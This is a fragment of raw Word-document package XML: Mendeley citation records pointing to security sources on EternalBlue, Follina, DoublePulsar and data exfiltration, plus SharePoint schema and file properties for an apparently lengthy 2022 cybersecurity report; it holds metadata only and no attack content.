Tracks&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,8,9]]},&quot;URL&quot;:&quot;https://hack.technoherder.com/covering-your-tracks/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_e17ec9bb-1b38-4575-9d1d-db693e5ed89b&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[33]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;e526e9ab-ab53-302f-ae28-dda1469f721c&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;e526e9ab-ab53-302f-ae28-dda1469f721c&quot;,&quot;title&quot;:&quot;Follina — a Microsoft Office code execution vulnerability | by Kevin Beaumont | May, 2022 | DoublePulsar&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,17]]},&quot;URL&quot;:&quot;https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_6d0eea28-2506-4f36-a5c4-e44a8a57145c&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNmQwZWVhMjgtMjUwNi00ZjM2LWE1YzQtZTQ0YThhNTcxNDVj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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_29aece9e-eba1-4063-96d4-75c2406622d8&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMjlhZWNlOWUtZWJhMS00MDYzLTk2ZDQtNzVjMjQwNjYyMmQ4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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_605d30ff-5668-4ab6-ad35-1800509cdb2e&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNjA1ZDMwZmYtNTY2OC00YWI2LWFkMzUtMTgwMDUwOWNkYjJl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quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_624fa375-f2c7-4881-a578-8fb198644811&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[40]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1cd8ccc-700a-3e20-8f82-1074f811ce20&quot;,&quot;title&quot;:&quot;EternalBlue - Everything There Is To Know - Check Point Research&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,22]]},&quot;URL&quot;:&quot;https://research.checkpoint.com/2017/eternalblue-everything-know/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_10a170b7-5618-4510-b0d4-476b09c6fe8d&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[60]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;dcba691c-2821-3f0f-bafe-fc79d31b96ff&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;dcba691c-2821-3f0f-bafe-fc79d31b96ff&quot;,&quot;title&quot;:&quot;DoublePulsar – A Very Sophisticated Payload for Windows - SecPod Blog&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,23]]},&quot;URL&quot;:&quot;https://www.secpod.com/blog/doublepulsar-a-very-sophisticated-payload-for-windows/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_9901d145-b8b9-4952-b22b-49536e7143bb&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[61]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;b2680a4d-8b1e-3123-8ce1-e77317321422&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;b2680a4d-8b1e-3123-8ce1-e77317321422&quot;,&quot;title&quot;:&quot;Data Exfiltration: What It Is and How to Prevent It | Mimecast&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,8,8]]},&quot;URL&quot;:&quot;https://www.mimecast.com/blog/what-is-data-exfiltration/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]}]"/>
    <we:property name="MENDELEY_CITATIONS_STYLE" value="{&quot;id&quot;:&quot;https://www.zotero.org/styles/ieee&quot;,&quot;title&quot;:&quot;IEEE&quot;,&quot;format&quot;:&quot;numeric&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DD474D77448BA4AA75BA3F3B269BE11" ma:contentTypeVersion="13" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="09aae82ea535eba12b65005745dcd55f">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="1c03a1d9-70c4-477b-aef0-fd07cc731e16" xmlns:ns4="faa71f4d-89e4-4bc7-bae8-eb8f92ec0efb" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a064235f61bb8c1cc755e0f15ed2ba43" ns3:_="" ns4:_="">
    <xsd:import namespace="1c03a1d9-70c4-477b-aef0-fd07cc731e16"/>
    <xsd:import namespace="faa71f4d-89e4-4bc7-bae8-eb8f92ec0ef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03a1d9-70c4-477b-aef0-fd07cc731e1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aa71f4d-89e4-4bc7-bae8-eb8f92ec0ef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0D04E4-6F4D-4B66-912E-EE6E813A0407}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{28E708EC-0681-4728-9F5C-AFFAEFD3F45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F3C9820-10BF-445D-BD90-E6CBB415BE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03a1d9-70c4-477b-aef0-fd07cc731e16"/>
    <ds:schemaRef ds:uri="faa71f4d-89e4-4bc7-bae8-eb8f92ec0e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780B97-8F14-434F-AA1C-51C222AD8D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148</Pages>
  <Words>18779</Words>
  <Characters>107044</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>892</Lines>
  <Paragraphs>251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Frey</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Helen Frey</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <cp:lastPrinted>2022-09-02T09:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-19T10:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-04T12:31:00Z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0x0101003DD474D77448BA4AA75BA3F3B269BE11</vt:lpwstr>
  </property>
</Properties>
</file>